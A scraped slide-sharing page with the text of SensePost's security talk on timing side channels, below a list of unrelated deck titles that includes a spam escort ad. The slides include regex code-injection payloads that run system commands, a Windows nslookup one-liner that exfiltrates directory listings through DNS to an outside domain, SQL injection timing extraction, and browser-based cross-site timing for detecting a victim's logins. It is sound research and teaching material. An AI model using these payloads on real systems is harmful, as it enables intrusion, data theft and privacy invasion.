"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
Fwdays
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
operationspcvita
 
Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!
Tobias Schneck
 
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
AlexanderRichford
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
FilipTomaszewski5
 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
Ivo Velitchkov
 
Day 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio FundamentalsDay 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio Fundamentals
UiPathCommunity
 
Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...
Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...
Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...
manji sharman06
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Antonios Katsarakis
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
c5vrf27qcz
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
Fwdays
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
DianaGray10
 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
UiPathCommunity
 
MySQL InnoDB Storage Engine: Deep Dive - Mydbops
MySQL InnoDB Storage Engine: Deep Dive - MydbopsMySQL InnoDB Storage Engine: Deep Dive - Mydbops
MySQL InnoDB Storage Engine: Deep Dive - Mydbops
Mydbops
 
AI in the Workplace Reskilling, Upskilling, and Future Work.pptx
AI in the Workplace Reskilling, Upskilling, and Future Work.pptxAI in the Workplace Reskilling, Upskilling, and Future Work.pptx
AI in the Workplace Reskilling, Upskilling, and Future Work.pptx
Sunil Jagani
 
Getting the Most Out of ScyllaDB Monitoring: ShareChat's Tips
Getting the Most Out of ScyllaDB Monitoring: ShareChat's TipsGetting the Most Out of ScyllaDB Monitoring: ShareChat's Tips
Getting the Most Out of ScyllaDB Monitoring: ShareChat's Tips
ScyllaDB
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
Pablo Gómez Abajo
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
AstuteBusiness
 
ScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking ReplicationScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking Replication
ScyllaDB
 
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving
 

Recently uploaded (20)

"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
 
Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!
 
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
 
Day 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio FundamentalsDay 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio Fundamentals
 
Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...
Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...
Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
 
MySQL InnoDB Storage Engine: Deep Dive - Mydbops
MySQL InnoDB Storage Engine: Deep Dive - MydbopsMySQL InnoDB Storage Engine: Deep Dive - Mydbops
MySQL InnoDB Storage Engine: Deep Dive - Mydbops
 
AI in the Workplace Reskilling, Upskilling, and Future Work.pptx
AI in the Workplace Reskilling, Upskilling, and Future Work.pptxAI in the Workplace Reskilling, Upskilling, and Future Work.pptx
AI in the Workplace Reskilling, Upskilling, and Future Work.pptx
 
Getting the Most Out of ScyllaDB Monitoring: ShareChat's Tips
Getting the Most Out of ScyllaDB Monitoring: ShareChat's TipsGetting the Most Out of ScyllaDB Monitoring: ShareChat's Tips
Getting the Most Out of ScyllaDB Monitoring: ShareChat's Tips
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
 
ScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking ReplicationScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking Replication
 
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
 

It's all about the timing

  • 1.
  • 2. Agenda • Who we are • What this talk is about • Why? • Background • Timing as a Channel • Timing as a Vector • Privacy Implications - XSRT? • Another acronym - (D)XSRT! • Conclusion / Questions
  • 3. Who we are.. • SensePost – Formed in 2000 – Written a few papers.. – Spoken at a few conferences – Written a few books – Done some Training • marco • haroon http://www.sensepost.com/blog
  • 4. What is this talk about? • Timing Stuff.. • Who should care ? – If you are a developer.. • Awareness of your applications leakage – If you are a Pen-Tester.. • You could be missing attack vectors completely (or stopping short of full ownage when its relatively trivial!) – If you like new acronyms! • X.S.R.T • (D)X.S.R.T
  • 5. Stepping Back a Little An illustrious history of side channel attacks on computing systems – differential power analysis • hardware – EM radiation emission analysis • hardware – timing analysis • software/hardware
  • 6. Traditional Timing • Timing has received lots of attention over the years in the area of crypt- analysis – Kocher [1996] • 1st local results against RSA and DH – Brumley & Boneh [2003] • Derived partial RSA over network due to weaknesses in OpenSSL – Bernstein [2004] • Derived full AES key across custom network clients – Percival [2005] • L1 cache access times could be used on HT processors to derive RSA key bits
  • 7. Web Time • Felten & Schneider [2000] – early results on timing and the web – focused on privacy • browser cache snooping • dns cache snooping • Kinderman [2003] – Java applet in JavaScript
  • 8. Web Time Point Oh – Grossman & Niedzialkowski [2006] – SPI Dynamics [2006] • Both released a JavaScript port scanner using JS’s onerror feature. Implicitly uses timing attacks (connection timed out, hence it is closed) – Bortz, Boneh & Nandy [2007] • Direct timing (valid usernames, hidden gallery sizes) • Cross Site Timing – <img onerror=xxxxx>
  • 9. A Communication Channel • A solid channel is a real basic requirement. • A quick progression of remote command execution attacks (relevant to channels)
  • 10. The App. Is the Channel • Sometimes the application by its nature gives data back to the attacker.. • Command injection • Friendly SQL queries
  • 11. The App. Is the Channel • Sometimes the firewalling is so poor that the whole things is almost moot! • But we cant count on being that lucky…
  • 12. The App. Is the Channel • So what happens when it gets a little tighter? $search_term = $user_input; if($recordset =~ /$search_term/ig) do_stuff();
  • 13. The App. Is the Channel $search_term = $user_input; if($recordset =~ /$search_term/ig) do_stuff(); (?{`uname`;}) (?{`sleep 20`;}) (?{`perl -e 'system("sleep","10");'`;}) (?{`perl -e 'sleep(ord(substr(qx/uname/, 0,1)))'`;})
  • 14. Proof of my lame’ness wh00t:~/customers/bh haroon$ python timing.py "uname" [*] POST built and encoded [*] Got Response: HTTP/1.1 200 [*] [83.0] seconds [*] ['S'] [*] POST built and encoded [*] Got Response: HTTP/1.1 200 [*] [83.0, 117.0] seconds [*] ['S', 'u'] [*] POST built and encoded [*] Got Response: HTTP/1.1 200 [*] [83.0, 117.0, 110.0] seconds [*] ['S', 'u', 'n'] [*] POST built and encoded [*] Got Response: HTTP/1.1 200 [*] [83.0, 117.0, 110.0, 79.0] seconds [*] ['S', 'u', 'n', 'O'] [*] POST built and encoded [*] Got Response: HTTP/1.1 200 [*] [83.0, 117.0, 110.0, 79.0, 83.0] seconds [*] ['S', 'u', 'n', 'O', 'S'] [*] POST built and encoded [*] Got Response: HTTP/1.1 200 [*] [83.0, 117.0, 110.0, 79.0, 83.0, 10.0] seconds [*] ['S', 'u', 'n', 'O', 'S', 'n']
  • 15. Proof (II) • Clearly this had issues.. • ord('A') => 65 • unpack(B32, ’A') => 01000001 – Sleep 0 – Sleep 1 – Sleep 0 –…
  • 16. SQL Injection (Classic) • SQL & WWW Server are the same box.. (same as birdseye) • echo foo > c:inetpubwwwroot..
  • 17. SQL Injection (same) • But outbound access like this almost never happens anymore..
  • 18. Confirming execution? • Call home: (ping, smb,nc..etc) • Rudimentary timing: (‘ping -n20 localhost’) • Nslookup:‘nslookup moo_moo.sensepost.com’ • We thought DNS was worth chasing..
  • 19. Poor mans dns tunnel • for /F "usebackq tokens=1,2,3,4* %i in ('dir c: /b') do nslookup %i.sensepost.com • Works fine for small pieces of data.. • Sucks for anything binary.. • Sucks for anthing over 255 chars
  • 20. Poor mans dns tunnel • Aka - introducing squeeza • Inspired (in part) by Sec-1 Automagic SQL Injector.. • Provides – Simple shell to pull server-side data into tables (sql query / xp_cmdshell / etc) – Return channel to get inserted data from the server to us – Binary-safe transport – Reliable transport • Requirements – ruby – tcpdump – possibly access to a DNS server – large SQL injection point
  • 21. Squeeza’s DNS internals 1 Basic Operation: 1. Initial HTTP request pulls data into a predefined table SQCMD. 2. For each row ri in SQCMD, send a HTTP request to: a) chop ri into fixed-size blocks b1, b2, … bn = ri b) For each block bj, convert to hex hj = hex(bj) c) Prepend header to and append domain to hj. d) Initiate DNS lookup for hj. e) Capture the DNS request with Squeeza, decode hex and store the block. 3. If blocks are missing, re-request them.
  • 22. Squeeza’s DNS internals 2 • Keep in mind that pulling data into the table is not related to extracting it. i.e. the source can vary • The default method of kicking off DNS queries is xp_cmdshell+nslookup. Oftentimes that stored proc isn’t available or allowed. • Can we cause DNS request to be initiated otherwise? 1_29_1_93.0x717171717171717171717171717171717 171717171717171.7171717171.sensepost.com.c$ • Of course! • xp_getfiledetails()
  • 24. Hey!! • I thought this talk was about timing? • SQL Server’s “waitfor delay” • Used by a few injection tools as a boolean operator (sql injector powershell, sqlninja, etc) • If user=sa {waitfor 10}, else{waitfor delay 20} • So… (considering lessons learned from squeeza_I and oneTime.py, we can: – Execute command / extract data into new table – Encode table as binary strings `hostname` = winbox = 01110111 01101001 01101110 01100010 01101111 01111000 – Sleep 0, sleep 2, sleep 2, sleep 0, ..
  • 25. More proof of my lame’ness • Aka - more squeeza coolness.. • anotherTime.py: • Squeeza’s timing channel:
  • 26. But how reliable is timing? • Well, that all depends on how reliable your line is • But we can try to accommodate shaky lines and loaded servers with a sprinkling of stats • Basic calibration idea is to collect a sample set of 0-bit and 1-bit requests, discard outliers, apply elementary statistics and derive two landing pads • If the landing pads are far enough apart, we’ll use them, otherwise increase the time delay for 1-bits and re-calibrate
  • 27. Timing Calibration Request Timings 100 90 80 70 re u n y 60 F qec 0-bit 50 1-bit 40 30 20 10 0 5 15 25 35 45 55 65 75 85 95 5 10 Time in ms 0-bit Discarded 1-bit Discarded 0 time
  • 28. More squeeza cool’ness • Additional channels • File Transfer. • Modularityness :) • http://www.sensepost.com/research/squ eeza
  • 29. Timing as its own Vector • Information Leakage is big when Application Testing • (not just because it allows security guys to say “Use generic error messages!”) • This is useful to us as attackers / analysts..
  • 30. But.. • We have been beating this drum for a bit, • So you see it less frequently in the wild, • But.. – Subtle timing differences are sometimes present, – We just haven't been listening.. – Hardware security Tokens (longer round trip times)
  • 31. Timing failed logins • Perfect example of what we discussed.. • Can you spot it ? • We thought it was pretty cool at the time.. (yetAnotherTime.py)
  • 32. Why is this scary? • We took a quick look at most popular application scanners out there.. • None made any reference at all to caring about timing at all.. • We built it into Suru (but to be honest, only since we discovered timing love!) • Do it manually, buy Suru, or step on your app-scan vendors!
  • 33. Timing and Privacy • Same Origin Policy: • The point was simple: Don’t let site- A get results from site-B unless they are related.. • So how did Jeremiah (and friends) do all that port-scanning coolness? – They used JavaScript onLoad() and onError() events to determine if they can access a host:port – Variation with CSS and link visited followed.
  • 34. Timing and Privacy • Portscanning was soon followed by History checking: • Using CSS to determine if links were visited. • Ed Felten in 2000 examined the dangers of Java and Timing to users Privacy by timing load times. • Felten’s 2000 Timing Attack on Privacy.
  • 35. We thought • We thought we invented a new acronym.. • XSRT - Cross Site Request Timing.. – We were wrong: (Andrew Bortz - 2007) – Exactly the same attack: (Are you currently logged into linkedin / myspace / facebook / bank.com / internetbanking?) • Example: – Fetch (http://www.facebook.com/friends.php?r)
  • 36. X.S.R.T • Cross Site Request Timing.. • Simply: • Victim visits attackers website (or site with attackers JS) • JavaScript causes Victims browser to surf to http://www.facebook.com/friends.php?r • JavaScript determines load time, to decide if user is (or isnt logged in) (> 50ms - user logged in) • Problem: This doesn’t work the same for U.S victims and .ZA victims! (.za adds 100ms just by default!)
  • 37. X.S.R.T • We introduce the concept of a base- page 1. Fetch page available to both Logged-in and Logged-out users (base-page) (X Seconds) 2. Fetch the page available only to Logged-in users (Y Seconds) 3. Calculate X/Y • This gives us a latency resistant method of determining logged- in/logged-out status • (What about cached pages?)
  • 38. • Wow! We can tell a user if he is or isnt logged into mailbox? • (Can we determine this remotely?)
  • 39. So.. • Lets summarize this quickly.. – We know some sites will betray valid usernames through timing differences – We know that (most) sites will betray a valid login from an invalid one based on timing.. – We know we can use your browser to time stuff while you are surfing..
  • 40. Hampster!! QuickTime™ and a xvid decompressor are needed to see this picture.
  • 41. (D) X.S.R.T • (Re)Introducing: • Distributed Cross Site Request Timing • Lets take it in stages: – Recall the timing script we ran against the Internet Banking site (timing.py) – We can implement that in JavaScript (so instead of running it from through python on my box, I can run it in JavaScript on your box!) – A small time granularity problem!
  • 42. A More Granular Timer? // pdp architects code to obtain local browser IP Address func t io n g et Net In fo() { var s o ck = n e w ja va.net .So ck e t(); so ck.bi n d(n e w jav a .ne t .In e tSo cketA dd ress( '0. 0 .0 .0', 0)); so ck. con n e ct(n e w java.net .Ine tSoc ke t Address (d o cum e nt .domain , (!d o cum e nt .lo cat io n.po rt)?8 0: d o cum e nt. loc a ti o n. p or t )); ret u rn {doma in: so ck .get LocalAd d res s ().g e t Ho stNam e (), ip: so ck. g etL o calAdd ress( ).g et Ho s tAdd re ss()}; } So: nanoTime() from java.lang.System
  • 43. (D) X.S.R.T • Distributed Cross Site Request Timing • Lets take it in stages: – Recall the timing script we ran against the Internet Banking site (timing.py) – We can implement that in JavaScript (so instead of running it from through python on my box, I can run it in JavaScript on your box!) – A small time granularity problem! (No problem!) – timing.py => timing.js :) – Runs in your browser, Reports success to Attackers Machine
  • 45. Conclusion. • Developers: – Make sure you are not throwing away valuable intel through timing delta’s – Investigate the standard XSRF detection techniques • Network Security Admins: – Re-examine least privelege, Does your SQL Server need DNS? – Does your IDS detect spurious DNS requests? (to your own DNS Server?) – Would you spot the Timing Attacks in your logs? • Pen-Testers / Researchers: – XSS + Header Injection.. – Grab a copy of squeeza from http://www.sensepost.com/research/squeeza – Add modules / Drop us feedback • All: – Feedback – http://www.sensepost.com/blog